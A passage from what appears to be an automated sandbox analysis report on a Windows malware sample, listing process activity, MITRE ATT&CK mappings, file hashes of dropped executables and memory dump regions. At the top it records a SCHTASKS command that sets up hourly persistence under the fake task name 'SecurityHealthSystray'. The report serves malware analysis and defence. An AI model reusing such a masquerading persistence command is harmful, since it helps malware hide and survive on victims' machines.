SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 720
2⤵
- Program crash
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 432 -ip 432
1⤵
PID:2468

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\config.json

Filesize
319B

MD5
c5f8798ae874128f672a5530896be6c8

SHA1
af8ea8134104bd02b44e9ba22cd0aec237274803

SHA256
9f39bae97cbc0a943def6b6b954a57c45e938648b506a3b9196684cdbbb53a78

SHA512
7f01c1aab052614e921974ccfcfacdc15afac8a0660cb89790233480eb9e64a0f0aa6fd3495e20708e54569456a83b8b70716e49fbb20d15d3227c11502f32fa

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
761fee773ec1e1eb396eddddeb321865

SHA1
f969e9da9e90a5aef00730b8e1c3763ba2ac46c5

SHA256
82273f8e42cee630011c8e931351186391c4ca9e126e5921db275564e1ef7fbb

SHA512
3f648b7c88b1e0195acad5ad194b59f5de8f2bf9179b2cc330d7ef1a028d48141541545b2354137a2ab0105e92fb75d9e0e11c9250ee1bcb7a4f472de3637a5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f03226e9192ad755823472f23b8740fa

SHA1
bef78c5aae3d05ba5e1cf73ed05ec91df31fc221

SHA256
e4a939a94237130a9a80196242eba964e250106c4ed62a941953572d35541e8e

SHA512
2dee10d7c837d9011b7d0bccc1837443c2be3088f6751812ba23960ea5fa1f0bbfd7e5a9ee9515717d8c83e0a6bfb26810b202c8a9d00aa21fe9a4f273243f32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e99b43a9ac4f2194ed4fb5c3d4d7f3b1

SHA1
dbb9326a5a541939ac49ff0f92c91105d1d0a8b1

SHA256
f51cccdf3fa16bab467ab3b2274c24c2dcae6ee7d54c2e5bbac303de57b8b395

SHA512
c5cd76b335974f22672e90ddd57fc8e7ee717c7a6f1f48cac5dcca743dbf96ffeb510fe2c9fd55e1fec5e93f1e0b2a1ac3a8c2d7be2dde4953fd43dc927232b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
165ad0f1a4a75dbab2254f8e35e7011f

SHA1
f6da696891b7aed0b0bcb6e369fbd8c042d5afec

SHA256
4a30e4d38fa904b9f4f45d2a3a8e876aaacda299934dce5a8993db92bfb7e994

SHA512
66f464890a39cc1291b486bb08befb841b41343c0dad92d54101852220991b53f961755760fb43494b6abb77029ba5e9de814f071bd22e592599408793ca10f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
165ad0f1a4a75dbab2254f8e35e7011f

SHA1
f6da696891b7aed0b0bcb6e369fbd8c042d5afec

SHA256
4a30e4d38fa904b9f4f45d2a3a8e876aaacda299934dce5a8993db92bfb7e994

SHA512
66f464890a39cc1291b486bb08befb841b41343c0dad92d54101852220991b53f961755760fb43494b6abb77029ba5e9de814f071bd22e592599408793ca10f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
bbba2c59870cf15f58294f1ddfc90f46

SHA1
60072e55c03d335e7c803e4e9675c9b28305ec7b

SHA256
e7007da0eea18e5dce1d8cd2f3c1bfd92b3ebea60cad9e756e47c0bbd60eb50c

SHA512
c2e5ff37d448a08332f62bef145eeaba51539e938f0db0429b50795d6794b4838bdcd8d8da43a9b26e45329942831d6dc7bdd220c43af65d9bd58513092784d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yir4imhy.5fv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1828-241-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/1828-259-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/1828-272-0x000000007FB30000-0x000000007FB40000-memory.dmp

Filesize
64KB

Download
memory/1828-249-0x0000000075500000-0x000000007554C000-memory.dmp

Filesize
304KB

Download
memory/1828-242-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/1928-329-0x0000000002F00000-0x0000000002F20000-memory.dmp

Filesize
128KB

Download
memory/1928-323-0x00000000013D0000-0x00000000013F0000-memory.dmp

Filesize
128KB

Download
memory/1928-325-0x0000000001410000-0x0000000001450000-memory.dmp

Filesize
256KB

Download
memory/1928-326-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1928-327-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1928-328-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1928-330-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1928-331-0x0000000002F00000-0x0000000002F20000-memory.dmp

Filesize
128KB

Download
memory/1928-332-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1928-333-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1928-334-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1928-335-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/2156-171-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

Filesize
64KB

Download
memory/2156-157-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

Filesize
64KB

Download
memory/2156-143-0x00000000027F0000-0x0000000002826000-memory.dmp

Filesize
216KB

Download
memory/2156-182-0x0000000007360000-0x0000000007368000-memory.dmp

Filesize
32KB

Download
memory/2156-144-0x0000000005100000-0x0000000005728000-memory.dmp

Filesize
6.2MB

Download
memory/2156-145-0x0000000004E40000-0x0000000004E62000-memory.dmp

Filesize
136KB

Download
memory/2156-181-0x0000000007410000-0x000000000742A000-memory.dmp

Filesize
104KB

Download
memory/2156-177-0x0000000007320000-0x000000000732E000-memory.dmp

Filesize
56KB

Download
memory/2156-146-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download
memory/2156-156-0x0000000004AC0000-0x0000000004AD0000-memory.dmp

Filesize
64KB

Download
memory/2156-158-0x0000000005DE0000-0x0000000005DFE000-memory.dmp

Filesize
120KB

Download
memory/2156-159-0x0000000006FD0000-0x0000000007002000-memory.dmp

Filesize
200KB

Download
memory/2156-176-0x0000000007370000-0x0000000007406000-memory.dmp

Filesize
600KB

Download
memory/2156-160-0x0000000075240000-0x000000007528C000-memory.dmp

Filesize
304KB

Download
memory/2156-170-0x0000000006390000-0x00000000063AE000-memory.dmp

Filesize
120KB

Download
memory/2156-172-0x0000000007740000-0x0000000007DBA000-memory.dmp

Filesize
6.5MB

Download
memory/2156-173-0x000000007F460000-0x000000007F470000-memory.dmp

Filesize
64KB

Download
memory/2156-174-0x00000000070E0000-0x00000000070FA000-memory.dmp

Filesize
104KB

Download
memory/2156-175-0x0000000007150000-0x000000000715A000-memory.dmp

Filesize
40KB

Download
memory/2224-240-0x0000000007AA0000-0x0000000007AB0000-memory.dmp

Filesize
64KB

Download
memory/2224-317-0x0000000007AA0000-0x0000000007AB0000-memory.dmp

Filesize
64KB

Download
memory/2224-192-0x0000000000BC0000-0x0000000000BD6000-memory.dmp

Filesize
88KB

Download
memory/2708-306-0x0000000004430000-0x0000000004440000-memory.dmp

Filesize
64KB

Download
memory/2708-294-0x0000000075500000-0x000000007554C000-memory.dmp

Filesize
304KB

Download
memory/2708-248-0x0000000004430000-0x0000000004440000-memory.dmp

Filesize
64KB

Download
memory/4004-307-0x000000007F1F0000-0x000000007F200000-memory.dmp

Filesize
64KB

Download
memory/4004-273-0x0000000002E60000-0x0000000002E70000-memory.dmp

Filesize
64KB

Download
memory/4004-247-0x0000000002E60000-0x0000000002E70000-memory.dmp

Filesize
64KB

Download
memory/4004-284-0x0000000075500000-0x000000007554C000-memory.dmp

Filesize
304KB

Download
memory/4028-305-0x000000007F830000-0x000000007F840000-memory.dmp

Filesize
64KB

Download
memory/4028-246-0x0000000004A60000-0x0000000004A70000-memory.dmp

Filesize
64KB

Download
memory/4028-262-0x0000000004A60000-0x0000000004A70000-memory.dmp

Filesize
64KB

Download
memory/4028-274-0x0000000075500000-0x000000007554C000-memory.dmp

Filesize
304KB

Download
memory/4352-261-0x0000000075500000-0x000000007554C000-memory.dmp

Filesize
304KB

Download
memory/4352-245-0x00000000027F0000-0x0000000002800000-memory.dmp

Filesize
64KB

Download
memory/4352-260-0x00000000027F0000-0x0000000002800000-memory.dmp

Filesize
64KB

Download
memory/4352-243-0x00000000027F0000-0x0000000002800000-memory.dmp

Filesize
64KB

Download
memory/4352-304-0x000000007F750000-0x000000007F760000-memory.dmp

Filesize
64KB

Download
memory/4912-133-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/4912-187-0x0000000007F10000-0x0000000007F20000-memory.dmp

Filesize
64KB

Download
memory/4912-142-0x0000000007F10000-0x0000000007F20000-memory.dmp

Filesize
64KB

Download
memory/4912-141-0x0000000007D10000-0x0000000007D76000-memory.dmp

Filesize
408KB

Download
memory/4912-140-0x0000000005830000-0x000000000583A000-memory.dmp

Filesize
40KB

Download
memory/4912-139-0x0000000007C70000-0x0000000007D02000-memory.dmp

Filesize
584KB

Download
memory/4912-138-0x0000000008180000-0x0000000008724000-memory.dmp

Filesize
5.6MB

Download